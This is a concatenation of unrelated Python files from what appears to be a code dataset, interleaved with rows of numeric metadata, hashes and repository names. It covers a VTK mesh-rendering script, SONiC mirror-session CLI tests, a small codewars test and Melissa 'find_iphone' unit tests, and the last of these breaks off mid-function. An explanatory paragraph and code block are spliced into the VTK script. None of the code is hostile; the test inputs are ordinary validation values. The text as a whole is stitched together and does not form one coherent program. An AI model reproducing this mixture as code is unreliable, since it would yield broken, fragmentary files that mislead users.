points.InsertNextPoint(0,27,2)
points.InsertNextPoint(0,27,-2)
points.InsertNextPoint(2,27,0)
points.InsertNextPoint(-14,4,-1)
points.InsertNextPoint(-14,3,0)
points.InsertNextPoint(-14,5,0)
points.InsertNextPoint(-14,4,1)
points.InsertNextPoint(-1,38,-2)
points.InsertNextPoint(-1,38,2)
points.InsertNextPoint(2,35,-2)
points.InsertNextPoint(2,35,2)
points.InsertNextPoint(17,42,0)
points.InsertNextPoint(15,40,2)
points.InsertNextPoint(15,39,-2)
points.InsertNextPoint(13,37,0)
points.InsertNextPoint(19,-2,-2)
points.InsertNextPoint(19,-2,2)
points.InsertNextPoint(15,2,-2)
points.InsertNextPoint(15,2,2)
faces = vtk.vtkCellArray()
faces.InsertNextCell(3)
faces.InsertCellPoint(3)
faces.InsertCellPoint(4)
faces.InsertCellPoint(5)
faces.InsertNextCell(3)
faces.InsertCellPoint(3)
faces.InsertCellPoint(5)
faces.InsertCellPoint(7)
faces.InsertNextCell(3)
faces.InsertCellPoint(3)
faces.InsertCellPoint(7)
faces.InsertCellPoint(6)
faces.InsertNextCell(3)
faces.InsertCellPoint(3)
faces.InsertCellPoint(6)
faces.InsertCellPoint(4)
faces.InsertNextCell(3)
faces.InsertCellPoint(0)
faces.InsertCellPoint(6)
faces.InsertCellPoint(7)
faces.InsertNextCell(3)
faces.InsertCellPoint(0)
faces.InsertCellPoint(7)
faces.InsertCellPoint(9)
faces.InsertNextCell(3)
faces.InsertCellPoint(0)
faces.InsertCellPoint(9)
faces.InsertCellPoint(8)
faces.InsertNextCell(3)
faces.InsertCellPoint(0)
faces.InsertCellPoint(8)
faces.InsertCellPoint(6)
faces.InsertNextCell(3)
faces.InsertCellPoint(1)
faces.InsertCellPoint(4)
faces.InsertCellPoint(6)
faces.InsertNextCell(3)
faces.InsertCellPoint(1)
faces.InsertCellPoint(6)
faces.InsertCellPoint(8)
faces.InsertNextCell(3)
faces.InsertCellPoint(1)
faces.InsertCellPoint(8)
faces.InsertCellPoint(10)
faces.InsertNextCell(3)
faces.InsertCellPoint(1)
faces.InsertCellPoint(10)
faces.InsertCellPoint(4)
faces.InsertNextCell(3)
faces.InsertCellPoint(2)
faces.InsertCellPoint(11)
faces.InsertCellPoint(9)
faces.InsertNextCell(3)
faces.InsertCellPoint(2)
faces.InsertCellPoint(9)
faces.InsertCellPoint(7)
faces.InsertNextCell(3)
faces.InsertCellPoint(2)
faces.InsertCellPoint(7)
faces.InsertCellPoint(5)
faces.InsertNextCell(3)
faces.InsertCellPoint(2)
faces.InsertCellPoint(5)
faces.InsertCellPoint(11)
faces.InsertNextCell(3)
faces.InsertCellPoint(4)
faces.InsertCellPoint(15)
faces.InsertCellPoint(5)
faces.InsertNextCell(3)
faces.InsertCellPoint(4)
faces.InsertCellPoint(14)
faces.InsertCellPoint(15)
faces.InsertNextCell(3)
faces.InsertCellPoint(5)
faces.InsertCellPoint(13)
faces.InsertCellPoint(11)
faces.InsertNextCell(3)
faces.InsertCellPoint(5)
faces.InsertCellPoint(15)
faces.InsertCellPoint(13)
faces.InsertNextCell(3)
faces.InsertCellPoint(11)
faces.InsertCellPoint(12)
faces.InsertCellPoint(10)
faces.InsertNextCell(3)
faces.InsertCellPoint(11)
faces.InsertCellPoint(13)
faces.InsertCellPoint(12)
faces.InsertNextCell(3)
faces.InsertCellPoint(10)
faces.InsertCellPoint(14)
faces.InsertCellPoint(4)
faces.InsertNextCell(3)
faces.InsertCellPoint(10)
faces.InsertCellPoint(12)
faces.InsertCellPoint(14)
faces.InsertNextCell(3)
faces.InsertCellPoint(8)
faces.InsertCellPoint(17)
faces.InsertCellPoint(16)
faces.InsertNextCell(3)
faces.InsertCellPoint(8)
faces.InsertCellPoint(9)
faces.InsertCellPoint(17)
faces.InsertNextCell(3)
faces.InsertCellPoint(9)
faces.InsertCellPoint(19)
faces.InsertCellPoint(17)
faces.InsertNextCell(3)
faces.InsertCellPoint(9)
faces.InsertCellPoint(11)
faces.InsertCellPoint(19)
faces.InsertNextCell(3)
faces.InsertCellPoint(11)
faces.InsertCellPoint(18)
faces.InsertCellPoint(19)
faces.InsertNextCell(3)
faces.InsertCellPoint(11)
faces.InsertCellPoint(10)
faces.InsertCellPoint(18)
faces.InsertNextCell(3)
faces.InsertCellPoint(10)
faces.InsertCellPoint(16)
faces.InsertCellPoint(18)
faces.InsertNextCell(3)
faces.InsertCellPoint(10)
faces.InsertCellPoint(8)
faces.InsertCellPoint(16)
faces.InsertNextCell(3)
faces.InsertCellPoint(13)
faces.InsertCellPoint(21)
faces.InsertCellPoint(12)
faces.InsertNextCell(3)
faces.InsertCellPoint(12)
faces.InsertCellPoint(21)
faces.InsertCellPoint(20)
faces.InsertNextCell(3)
faces.InsertCellPoint(12)
faces.InsertCellPoint(20)
faces.InsertCellPoint(14)
faces.InsertNextCell(3)
faces.InsertCellPoint(14)
faces.InsertCellPoint(20)
faces.InsertCellPoint(22)
faces.InsertNextCell(3)
faces.InsertCellPoint(14)
faces.InsertCellPoint(22)
faces.InsertCellPoint(15)
faces.InsertNextCell(3)
faces.InsertCellPoint(15)
faces.InsertCellPoint(22)
faces.InsertCellPoint(23)
faces.InsertNextCell(3)
faces.InsertCellPoint(15)
faces.InsertCellPoint(23)
faces.InsertCellPoint(13)
faces.InsertNextCell(3)
faces.InsertCellPoint(13)
faces.InsertCellPoint(23)
faces.InsertCellPoint(21)
faces.InsertNextCell(3)
faces.InsertCellPoint(21)
faces.InsertCellPoint(25)
faces.InsertCellPoint(24)
faces.InsertNextCell(3)
faces.InsertCellPoint(21)
faces.InsertCellPoint(24)
faces.InsertCellPoint(20)
faces.InsertNextCell(3)
faces.InsertCellPoint(20)
faces.InsertCellPoint(24)
faces.InsertCellPoint(26)
faces.InsertNextCell(3)
faces.InsertCellPoint(20)
faces.InsertCellPoint(26)
faces.InsertCellPoint(22)
faces.InsertNextCell(3)
faces.InsertCellPoint(22)
faces.InsertCellPoint(26)
faces.InsertCellPoint(27)
faces.InsertNextCell(3)
faces.InsertCellPoint(22)
faces.InsertCellPoint(27)
faces.InsertCellPoint(23)
faces.InsertNextCell(3)
faces.InsertCellPoint(23)
faces.InsertCellPoint(27)
faces.InsertCellPoint(25)
faces.InsertNextCell(3)
faces.InsertCellPoint(23)
faces.InsertCellPoint(25)
faces.InsertCellPoint(21)
faces.InsertNextCell(3)
faces.InsertCellPoint(25)
faces.InsertCellPoint(29)
faces.InsertCellPoint(24)
faces.InsertNextCell(3)
faces.InsertCellPoint(24)
faces.InsertCellPoint(29)
faces.InsertCellPoint(28)
faces.InsertNextCell(3)
faces.InsertCellPoint(24)
faces.InsertCellPoint(28)
faces.InsertCellPoint(26)
faces.InsertNextCell(3)
faces.InsertCellPoint(26)
faces.InsertCellPoint(28)
faces.InsertCellPoint(30)
faces.InsertNextCell(3)
faces.InsertCellPoint(26)
faces.InsertCellPoint(30)
faces.InsertCellPoint(27)
faces.InsertNextCell(3)
faces.InsertCellPoint(27)
faces.InsertCellPoint(30)
faces.InsertCellPoint(31)
faces.InsertNextCell(3)
faces.InsertCellPoint(27)
faces.InsertCellPoint(31)
faces.InsertCellPoint(25)
faces.InsertNextCell(3)
faces.InsertCellPoint(25)
faces.InsertCellPoint(31)
faces.InsertCellPoint(29)
faces.InsertNextCell(3)
faces.InsertCellPoint(29)
faces.InsertCellPoint(19)
faces.InsertCellPoint(17)
faces.InsertNextCell(3)
faces.InsertCellPoint(29)
faces.InsertCellPoint(17)
faces.InsertCellPoint(28)
faces.InsertNextCell(3)
faces.InsertCellPoint(28)
faces.InsertCellPoint(17)
faces.InsertCellPoint(16)
faces.InsertNextCell(3)
faces.InsertCellPoint(28)
faces.InsertCellPoint(16)
faces.InsertCellPoint(30)
faces.InsertNextCell(3)
faces.InsertCellPoint(30)
faces.InsertCellPoint(16)
faces.InsertCellPoint(18)
faces.InsertNextCell(3)
faces.InsertCellPoint(30)
faces.InsertCellPoint(18)
faces.InsertCellPoint(31)
faces.InsertNextCell(3)
faces.InsertCellPoint(31)
faces.InsertCellPoint(18)
faces.InsertCellPoint(19)
faces.InsertNextCell(3)
faces.InsertCellPoint(31)
faces.InsertCellPoint(19)
faces.InsertCellPoint(29)
model = vtk.vtkPolyData()
model.SetPolys(faces)
model.SetPoints(points)
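The long run of `InsertNextCell(3)` / `InsertCellPoint(...)` calls above encodes each triangle as a cell count followed by three point ids. A compact sketch of that flat cell encoding in plain Python (no `vtk` dependency; only the first four faces are reproduced here for illustration):

```python
# VTK stores each cell as: [n_points, id0, id1, ..., id(n-1)].
# Appending len(tri) mirrors InsertNextCell(3); extending with the
# point ids mirrors the three InsertCellPoint calls.
triangles = [(3, 4, 5), (3, 5, 7), (3, 7, 6), (3, 6, 4)]  # first four faces

connectivity = []
for tri in triangles:
    connectivity.append(len(tri))   # cell size
    connectivity.extend(tri)        # point ids
```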
# Create the RenderWindow, Renderer and both Actors
#
ren1 = vtk.vtkRenderer()
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren1)
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
# Subdivide the model (Loop subdivision; vtkButterflySubdivisionFilter is an alternative)
subdivide = vtk.vtkLoopSubdivisionFilter()
subdivide.SetInputData(model)
subdivide.SetNumberOfSubdivisions(4)
mapper = vtk.vtkDataSetMapper()
mapper.SetInputConnection(subdivide.GetOutputPort())
rose = vtk.vtkLODActor()
rose.SetMapper(mapper)
fe = vtk.vtkFeatureEdges()
fe.SetInputConnection(subdivide.GetOutputPort())
fe.SetFeatureAngle(100)
feMapper = vtk.vtkPolyDataMapper()
feMapper.SetInputConnection(fe.GetOutputPort())
edges = vtk.vtkActor()
edges.SetMapper(feMapper)
# Add the actors to the renderer, set the background and size
#
ren1.AddActor(rose)
# ren1.AddActor(edges)
backP = vtk.vtkProperty()
backP.SetDiffuseColor(1,1,.3)
rose.SetBackfaceProperty(backP)
rose.GetProperty().SetDiffuseColor(1,.4,.3)
rose.GetProperty().SetSpecular(.4)
rose.GetProperty().SetDiffuse(.8)
rose.GetProperty().SetSpecularPower(40)
ren1.SetBackground(0.1,0.2,0.4)
renWin.SetSize(300,300)
# render the image
#
ren1.ResetCamera()
cam1 = ren1.GetActiveCamera()
cam1.Zoom(4.5)
cam1.Azimuth(-90)
ren1.ResetCameraClippingRange()
iren.Initialize()
# prevent the tk window from showing up, then start the event loop
# (for interactive use one would typically call renWin.Render() and iren.Start())
# --- end of script ---
| 27.484058 | 66 | 0.796984 | 1,125 | 9,482 | 6.715556 | 0.121778 | 0.508273 | 0.189014 | 0.21178 | 0.810589 | 0.792852 | 0.792588 | 0.755923 | 0.17591 | 0.17591 | 0 | 0.066667 | 0.08089 | 9,482 | 344 | 67 | 27.563953 | 0.800229 | 0.030584 | 0 | 0.771084 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.009036 | 0 | 0.009036 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
1b4e8ff47350a6eb68bf451228d9ba524fb5f184 | 135 | py | Python | tonks/ensemble/__init__.py | vanderveld/tonks | e87afbd9614b276b443b4a7527fd1fda01a8be4c | [
"BSD-3-Clause"
] | null | null | null | tonks/ensemble/__init__.py | vanderveld/tonks | e87afbd9614b276b443b4a7527fd1fda01a8be4c | [
"BSD-3-Clause"
] | null | null | null | tonks/ensemble/__init__.py | vanderveld/tonks | e87afbd9614b276b443b4a7527fd1fda01a8be4c | [
"BSD-3-Clause"
] | null | null | null | from tonks.ensemble.dataset import TonksEnsembleDataset
from tonks.ensemble.models import BertResnetEnsembleForMultiTaskClassification
| 45 | 78 | 0.911111 | 12 | 135 | 10.25 | 0.666667 | 0.146341 | 0.276423 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.059259 | 135 | 2 | 79 | 67.5 | 0.968504 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
1b5b07e529a9f06e7ea6512266b636077a02ef5a | 12,037 | py | Python | tests/config_mirror_session_test.py | liuh-80/sonic-utilities | 3d3c89bd75e3c70881c64e2a59043177c56111b4 | [
"Apache-2.0"
] | null | null | null | tests/config_mirror_session_test.py | liuh-80/sonic-utilities | 3d3c89bd75e3c70881c64e2a59043177c56111b4 | [
"Apache-2.0"
] | null | null | null | tests/config_mirror_session_test.py | liuh-80/sonic-utilities | 3d3c89bd75e3c70881c64e2a59043177c56111b4 | [
"Apache-2.0"
] | null | null | null | import pytest
import config.main as config
from unittest import mock
from click.testing import CliRunner
ERR_MSG_IP_FAILURE = "does not appear to be an IPv4 or IPv6 network"
ERR_MSG_IP_VERSION_FAILURE = "not a valid IPv4 address"
ERR_MSG_GRE_TYPE_FAILURE = "not a valid GRE type"
ERR_MSG_VALUE_FAILURE = "Invalid value for"
def test_mirror_session_add():
runner = CliRunner()
# Verify invalid src_ip
result = runner.invoke(
config.config.commands["mirror_session"].commands["add"],
["test_session", "400.1.1.1", "2.2.2.2", "8", "63", "10", "100"])
assert result.exit_code != 0
assert ERR_MSG_IP_FAILURE in result.stdout
# Verify invalid dst_ip
result = runner.invoke(
config.config.commands["mirror_session"].commands["add"],
["test_session", "1.1.1.1", "256.2.2.2", "8", "63", "10", "100"])
assert result.exit_code != 0
assert ERR_MSG_IP_FAILURE in result.stdout
# Verify invalid ip version
result = runner.invoke(
config.config.commands["mirror_session"].commands["add"],
["test_session", "1::1", "2::2", "8", "63", "10", "100"])
assert result.exit_code != 0
assert ERR_MSG_IP_VERSION_FAILURE in result.stdout
# Verify invalid dscp
result = runner.invoke(
config.config.commands["mirror_session"].commands["add"],
["test_session", "1.1.1.1", "2.2.2.2", "65536", "63", "10", "100"])
assert result.exit_code != 0
assert ERR_MSG_VALUE_FAILURE in result.stdout
# Verify invalid ttl
result = runner.invoke(
config.config.commands["mirror_session"].commands["add"],
["test_session", "1.1.1.1", "2.2.2.2", "6", "256", "10", "100"])
assert result.exit_code != 0
assert ERR_MSG_VALUE_FAILURE in result.stdout
# Verify invalid gre
result = runner.invoke(
config.config.commands["mirror_session"].commands["add"],
["test_session", "1.1.1.1", "2.2.2.2", "6", "63", "65536", "100"])
assert result.exit_code != 0
assert ERR_MSG_GRE_TYPE_FAILURE in result.stdout
result = runner.invoke(
config.config.commands["mirror_session"].commands["add"],
["test_session", "1.1.1.1", "2.2.2.2", "6", "63", "abcd", "100"])
assert result.exit_code != 0
assert ERR_MSG_GRE_TYPE_FAILURE in result.stdout
# Verify invalid queue
result = runner.invoke(
config.config.commands["mirror_session"].commands["add"],
["test_session", "1.1.1.1", "2.2.2.2", "6", "63", "65", "65536"])
assert result.exit_code != 0
assert ERR_MSG_VALUE_FAILURE in result.stdout
# Positive case
with mock.patch('config.main.add_erspan') as mocked:
result = runner.invoke(
config.config.commands["mirror_session"].commands["add"],
["test_session", "100.1.1.1", "2.2.2.2", "8", "63", "10", "100"])
mocked.assert_called_with("test_session", "100.1.1.1", "2.2.2.2", 8, 63, 10, 100, None)
result = runner.invoke(
config.config.commands["mirror_session"].commands["add"],
["test_session", "100.1.1.1", "2.2.2.2", "8", "63", "0X1234", "100"])
mocked.assert_called_with("test_session", "100.1.1.1", "2.2.2.2", 8, 63, 0x1234, 100, None)
result = runner.invoke(
config.config.commands["mirror_session"].commands["add"],
["test_session", "100.1.1.1", "2.2.2.2", "8", "63", "0", "0"])
mocked.assert_called_with("test_session", "100.1.1.1", "2.2.2.2", 8, 63, 0, 0, None)
def test_mirror_session_erspan_add():
runner = CliRunner()
# Verify invalid src_ip
result = runner.invoke(
config.config.commands["mirror_session"].commands["erspan"].commands["add"],
["test_session", "400.1.1.1", "2.2.2.2", "8", "63", "10", "100"])
assert result.exit_code != 0
assert ERR_MSG_IP_FAILURE in result.stdout
# Verify invalid dst_ip
result = runner.invoke(
config.config.commands["mirror_session"].commands["erspan"].commands["add"],
["test_session", "1.1.1.1", "256.2.2.2", "8", "63", "10", "100"])
assert result.exit_code != 0
assert ERR_MSG_IP_FAILURE in result.stdout
# Verify invalid ip version
result = runner.invoke(
config.config.commands["mirror_session"].commands["erspan"].commands["add"],
["test_session", "1::1", "2::2", "8", "63", "10", "100"])
assert result.exit_code != 0
assert ERR_MSG_IP_VERSION_FAILURE in result.stdout
# Verify invalid dscp
result = runner.invoke(
config.config.commands["mirror_session"].commands["erspan"].commands["add"],
["test_session", "1.1.1.1", "2.2.2.2", "65536", "63", "10", "100"])
assert result.exit_code != 0
assert ERR_MSG_VALUE_FAILURE in result.stdout
# Verify invalid ttl
result = runner.invoke(
config.config.commands["mirror_session"].commands["erspan"].commands["add"],
["test_session", "1.1.1.1", "2.2.2.2", "6", "256", "10", "100"])
assert result.exit_code != 0
assert ERR_MSG_VALUE_FAILURE in result.stdout
# Verify invalid gre
result = runner.invoke(
config.config.commands["mirror_session"].commands["erspan"].commands["add"],
["test_session", "1.1.1.1", "2.2.2.2", "6", "63", "65536", "100"])
assert result.exit_code != 0
assert ERR_MSG_GRE_TYPE_FAILURE in result.stdout
result = runner.invoke(
config.config.commands["mirror_session"].commands["erspan"].commands["add"],
["test_session", "1.1.1.1", "2.2.2.2", "6", "63", "abcd", "100"])
assert result.exit_code != 0
assert ERR_MSG_GRE_TYPE_FAILURE in result.stdout
# Verify invalid queue
result = runner.invoke(
config.config.commands["mirror_session"].commands["erspan"].commands["add"],
["test_session", "1.1.1.1", "2.2.2.2", "6", "63", "65", "65536"])
assert result.exit_code != 0
assert ERR_MSG_VALUE_FAILURE in result.stdout
# Positive case
with mock.patch('config.main.add_erspan') as mocked:
result = runner.invoke(
config.config.commands["mirror_session"].commands["erspan"].commands["add"],
["test_session", "100.1.1.1", "2.2.2.2", "8", "63", "10", "100"])
mocked.assert_called_with("test_session", "100.1.1.1", "2.2.2.2", 8, 63, 10, 100, None, None, None)
result = runner.invoke(
config.config.commands["mirror_session"].commands["erspan"].commands["add"],
["test_session", "100.1.1.1", "2.2.2.2", "8", "63", "0x1234", "100"])
mocked.assert_called_with("test_session", "100.1.1.1", "2.2.2.2", 8, 63, 0x1234, 100, None, None, None)
result = runner.invoke(
config.config.commands["mirror_session"].commands["erspan"].commands["add"],
["test_session", "100.1.1.1", "2.2.2.2", "8", "63", "0", "0"])
mocked.assert_called_with("test_session", "100.1.1.1", "2.2.2.2", 8, 63, 0, 0, None, None, None)
def test_mirror_session_span_add():
runner = CliRunner()
# Verify invalid queue
result = runner.invoke(
config.config.commands["mirror_session"].commands["span"].commands["add"],
["test_session", "Ethernet0", "Ethernet4", "rx", "65536"])
assert result.exit_code != 0
assert ERR_MSG_VALUE_FAILURE in result.stdout
# Verify invalid dst port
result = runner.invoke(
config.config.commands["mirror_session"].commands["span"].commands["add"],
["test_session", "Ethern", "Ethernet4", "rx", "100"])
assert result.exit_code != 0
assert "Error: Destination Interface Ethern is invalid" in result.stdout
# Verify destination port not have vlan config
result = runner.invoke(
config.config.commands["mirror_session"].commands["span"].commands["add"],
["test_session", "Ethernet24", "Ethernet4", "rx", "100"])
assert result.exit_code != 0
assert "Error: Destination Interface Ethernet24 has vlan config" in result.stdout
# Verify destination port is not part of portchannel
result = runner.invoke(
config.config.commands["mirror_session"].commands["span"].commands["add"],
["test_session", "Ethernet116", "Ethernet4", "rx", "100"])
assert result.exit_code != 0
assert "Error: Destination Interface Ethernet116 has portchannel config" in result.stdout
# Verify destination port not router interface
result = runner.invoke(
config.config.commands["mirror_session"].commands["span"].commands["add"],
["test_session", "Ethernet0", "Ethernet4", "rx", "100"])
assert result.exit_code != 0
assert "Error: Destination Interface Ethernet0 is a L3 interface" in result.stdout
# Verify destination port not Portchannel
result = runner.invoke(
config.config.commands["mirror_session"].commands["span"].commands["add"],
["test_session", "PortChannel1001"])
assert result.exit_code != 0
assert "Error: Destination Interface PortChannel1001 is not supported" in result.output
# Verify source interface is invalid
result = runner.invoke(
config.config.commands["mirror_session"].commands["span"].commands["add"],
["test_session", "Ethernet52", "Ethern", "rx", "100"])
assert result.exit_code != 0
assert "Error: Source Interface Ethern is invalid" in result.stdout
# Verify source interface is not same as destination
result = runner.invoke(
config.config.commands["mirror_session"].commands["span"].commands["add"],
["test_session", "Ethernet52", "Ethernet52", "rx", "100"])
assert result.exit_code != 0
assert "Error: Destination Interface cant be same as Source Interface" in result.stdout
# Verify destination port not have mirror config
result = runner.invoke(
config.config.commands["mirror_session"].commands["span"].commands["add"],
["test_session", "Ethernet44", "Ethernet56", "rx", "100"])
assert result.exit_code != 0
assert "Error: Destination Interface Ethernet44 already has mirror config" in result.output
# Verify source port is not configured as dstport in other session
result = runner.invoke(
config.config.commands["mirror_session"].commands["span"].commands["add"],
["test_session", "Ethernet52", "Ethernet44", "rx", "100"])
assert result.exit_code != 0
assert "Error: Source Interface Ethernet44 already has mirror config" in result.output
# Verify source port is not configured in same direction
result = runner.invoke(
config.config.commands["mirror_session"].commands["span"].commands["add"],
["test_session", "Ethernet52", "Ethernet8,Ethernet40", "rx", "100"])
assert result.exit_code != 0
assert "Error: Source Interface Ethernet40 already has mirror config in same direction" in result.output
# Verify direction is invalid
result = runner.invoke(
config.config.commands["mirror_session"].commands["span"].commands["add"],
["test_session", "Ethernet52", "Ethernet56", "px", "100"])
assert result.exit_code != 0
assert "Error: Direction px is invalid" in result.stdout
# Positive case
with mock.patch('config.main.add_span') as mocked:
result = runner.invoke(
config.config.commands["mirror_session"].commands["span"].commands["add"],
["test_session", "Ethernet8", "Ethernet4", "tx", "100"])
mocked.assert_called_with("test_session", "Ethernet8", "Ethernet4", "tx", 100, None)
result = runner.invoke(
config.config.commands["mirror_session"].commands["span"].commands["add"],
["test_session", "Ethernet0", "Ethernet4", "rx", "0"])
mocked.assert_called_with("test_session", "Ethernet0", "Ethernet4", "rx", 0, None)
| 44.581481 | 111 | 0.62798 | 1,580 | 12,037 | 4.649367 | 0.072152 | 0.021236 | 0.020419 | 0.117615 | 0.910155 | 0.887966 | 0.879662 | 0.858154 | 0.827525 | 0.820447 | 0 | 0.065978 | 0.211764 | 12,037 | 269 | 112 | 44.747212 | 0.708263 | 0.070283 | 0 | 0.751323 | 0 | 0 | 0.271864 | 0.003943 | 0 | 0 | 0.002151 | 0 | 0.338624 | 1 | 0.015873 | false | 0 | 0.021164 | 0 | 0.037037 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1b832210bdf2063c05cb17d9c581e350b6da7f06 | 163 | py | Python | codewars/6kyu/doha22/playing_digits/test.py | doha22/Training_one | 0cd7cf86c7da0f6175834146296b763d1841766b | [
"MIT"
] | null | null | null | codewars/6kyu/doha22/playing_digits/test.py | doha22/Training_one | 0cd7cf86c7da0f6175834146296b763d1841766b | [
"MIT"
] | 2 | 2019-01-22T10:53:42.000Z | 2019-01-31T08:02:48.000Z | codewars/6kyu/doha22/playing_digits/test.py | doha22/Training_one | 0cd7cf86c7da0f6175834146296b763d1841766b | [
"MIT"
] | 13 | 2019-01-22T10:37:42.000Z | 2019-01-25T13:30:43.000Z | import unittest
from playing_digits import dig_pow
def test_dig_pow(benchmark):
assert benchmark(dig_pow,89,1) == 1
assert benchmark(dig_pow,92,1) == -1
| 20.375 | 40 | 0.742331 | 27 | 163 | 4.259259 | 0.518519 | 0.208696 | 0.313043 | 0.365217 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.058394 | 0.159509 | 163 | 7 | 41 | 23.285714 | 0.781022 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.4 | 1 | 0.2 | false | 0 | 0.4 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
1bcb2d2330258a30d9492bce0b3a59309cb27c17 | 6,599 | py | Python | tests/test_actions/test_find_iphone.py | blacksparrow6/Melissa-Core | ea08ae5e3088360d3bddc40db72160697522b8f7 | [
"MIT"
] | 554 | 2015-12-10T12:08:50.000Z | 2022-02-24T02:56:11.000Z | tests/test_actions/test_find_iphone.py | Blackmancardinal/Blackman-II | fd143d7620c957cc8add5f8d176e0ed3735612c9 | [
"MIT"
] | 178 | 2016-01-07T06:26:17.000Z | 2020-04-23T20:41:07.000Z | tests/test_actions/test_find_iphone.py | Blackmancardinal/Blackman-II | fd143d7620c957cc8add5f8d176e0ed3735612c9 | [
"MIT"
] | 300 | 2015-12-16T13:23:29.000Z | 2022-03-20T04:21:07.000Z | """test find_iphone modulue."""
from unittest import TestCase
try: # py3
from unittest import mock
except ImportError: # py2
import mock
from pyicloud.exceptions import PyiCloudFailedLoginException
M_USERNAME = 'm_username'
M_PASSWORD = 'm_password'
def test_find_iphone():
"""test find_iphone func.
when given with all mocked dependencies,
find_iphone will only give warning
about there is no iphone in the given account.
"""
m_text = mock.Mock()
with mock.patch('melissa.profile_loader.load_profile'):
from melissa import profile
profile.data = {
'icloud': {'username': M_USERNAME, 'password': M_PASSWORD}}
with mock.patch('melissa.actions.find_iphone.PyiCloudService') \
as m_pc_service, \
mock.patch('melissa.actions.find_iphone.tts') as m_tts:
from melissa.actions import find_iphone
find_iphone.profile.data = {
'icloud': {'username': M_USERNAME, 'password': M_PASSWORD}}
# run the func
find_iphone.find_iphone(m_text)
# testing.
m_pc_service.assert_called_once_with(M_USERNAME, M_PASSWORD)
m_tts.assert_called_once_with('No iPhones found in your account')
class WithProfileTest(TestCase):
"""test case with profile."""
def test_find_iphone_with_profile(self):
"""test find_iphone func.
when given with all mocked dependencies,
find_iphone will only give warning
about there is no iphone in the given account.
"""
m_text = mock.Mock()
from melissa.actions import find_iphone
with mock.patch('melissa.actions.find_iphone.PyiCloudService') \
as m_pc_service, \
mock.patch('melissa.actions.find_iphone.tts') as m_tts:
# run the func
find_iphone.find_iphone(m_text)
# testing.
m_pc_service.assert_called_once_with(M_USERNAME, M_PASSWORD)
m_tts.assert_called_once_with('No iPhones found in your account')
def test_find_iphone_with_a_phone(self):
"""test find_iphone func."""
m_text = mock.Mock()
m_device = mock.Mock()
m_device.status.return_value = {'deviceDisplayName': 'iPhone'}
from melissa.actions.find_iphone import find_iphone
with mock.patch('melissa.actions.find_iphone.PyiCloudService') \
as m_pc_service, \
mock.patch('melissa.actions.find_iphone.tts') as m_tts:
m_pc_service.return_value.devices = [m_device]
# run the func
find_iphone(m_text)
# testing.
m_pc_service.assert_called_once_with(M_USERNAME, M_PASSWORD)
m_tts.assert_called_once_with(
'Sending ring command to the phone now')
m_device.status.assert_called_once_with()
m_device.play_sound.assert_called_once_with()
def test_find_iphone_with_2_phones(self):
"""test find_iphone func."""
m_text = mock.Mock()
m_device1 = mock.Mock()
m_device1.status.return_value = {'deviceDisplayName': 'iPhone'}
m_device2 = mock.Mock()
m_device2.status.return_value = {'deviceDisplayName': 'iPhone'}
from melissa.actions.find_iphone import find_iphone
with mock.patch('melissa.actions.find_iphone.PyiCloudService') \
as m_pc_service, \
mock.patch('melissa.actions.find_iphone.tts') as m_tts:
m_pc_service.return_value.devices = [m_device1, m_device2]
# run the func
find_iphone(m_text)
# testing.
m_pc_service.assert_called_once_with(M_USERNAME, M_PASSWORD)
m_tts.assert_called_with(
'Sending ring command to the phone now')
m_device1.status.assert_called_once_with()
m_device1.play_sound.assert_called_once_with()
m_device2.status.assert_called_once_with()
m_device2.play_sound.assert_called_once_with()
def test_find_iphone_raise_failed_login(self):
"""test find iphone but raise failed login error."""
m_text = mock.Mock()
from melissa.actions.find_iphone import find_iphone
with mock.patch('melissa.actions.find_iphone.PyiCloudService') \
as m_pc_service, \
mock.patch('melissa.actions.find_iphone.tts') as m_tts:
m_pc_service.side_effect = PyiCloudFailedLoginException()
# run
find_iphone(m_text)
# testing
m_pc_service.assert_called_once_with(M_USERNAME, M_PASSWORD)
m_tts.assert_called_once_with('Invalid Username & Password')
def test_iphone_battery_raise_failed_login(self):
"""test find iphone but raise failed login error."""
m_text = mock.Mock()
from melissa.actions.find_iphone import iphone_battery
with mock.patch('melissa.actions.find_iphone.PyiCloudService') \
as m_pc_service, \
mock.patch('melissa.actions.find_iphone.tts') as m_tts:
m_pc_service.side_effect = PyiCloudFailedLoginException()
# run
iphone_battery(m_text)
# testing
m_pc_service.assert_called_once_with(M_USERNAME, M_PASSWORD)
m_tts.assert_called_once_with('Invalid Username & Password')
def test_iphone_battery_with_a_phone(self):
"""test find_iphone func."""
m_text = mock.Mock()
m_device = mock.Mock()
m_battery_level = 0.5
expected_percentage = int(float(m_battery_level) * 100)
m_tts_expected_arg = '{}percent battery left in m_name'.format(
expected_percentage)
